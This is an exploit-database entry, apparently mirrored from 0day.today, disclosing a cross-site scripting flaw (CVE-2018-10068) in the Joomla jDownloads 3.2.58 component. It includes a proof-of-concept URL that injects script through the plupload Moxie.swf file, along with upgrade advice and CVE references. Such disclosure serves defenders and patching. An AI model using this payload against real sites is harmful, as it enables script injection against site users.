Lucene search
Sureshbabu Narvaneni1337DAY-ID-30180HistoryApr 17, 2018 - 12:00 a.m.
Joomla jDownloads 3.2.58 Component Cross Site Scripting Vulnerability
2018-04-1700:00:00
Sureshbabu Narvaneni
0day.today
66
0.001 Low
EPSS
Percentile
47.1%
Exploit for php platform in category web applications
#######################################
# Exploit Title: Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.jdownloads.com/
# Software Link: http://www.jdownloads.com/index.php/downloads/category/6-jdownloads.html
# Affected Version: 3.2.58
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-10068
#
# 1. Vendor Description:
#
# Exclusive Download manager for Joomla!
#
# 2. Technical Description:
#
# Cross-site scripting (XSS) vulnerability in plupoad flash component in jDownloads before 3.2.59 allows remote attackers to inject arbitrary web script.
#
# 3. Proof Of Concept:
#
http://url/joomla/administrator/components/com_jdownloads/assets/plupload/js/Moxie.swf?target%g=alert&uid%g=nice
#
# 4. Solution:
#
# Upgrade to latest release.
# https://extensions.joomla.org/extension/jdownloads/
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10068
# https://vel.joomla.org/resolved/2150-jdownloads-3-2-58-xss-cross-site-scripting
#####################################
# 0day.today [2018-04-17] #Related
cve
cve
CVE-2018-10068
2018-04-12 18:29:00
packetstorm
packetstorm
Joomla jDownloads 3.2.58 Cross Site Scripting
2018-04-14 00:00:00
exploitpack
exploitpack
Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
2018-04-17 00:00:00
prion
prion
Cross site scripting
2018-04-12 18:29:00
cvelist
cvelist
CVE-2018-10068
2018-04-12 18:00:00
nvd
nvd
CVE-2018-10068
2018-04-12 18:29:00
exploitdb
exploitdb
Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
2018-04-17 00:00:00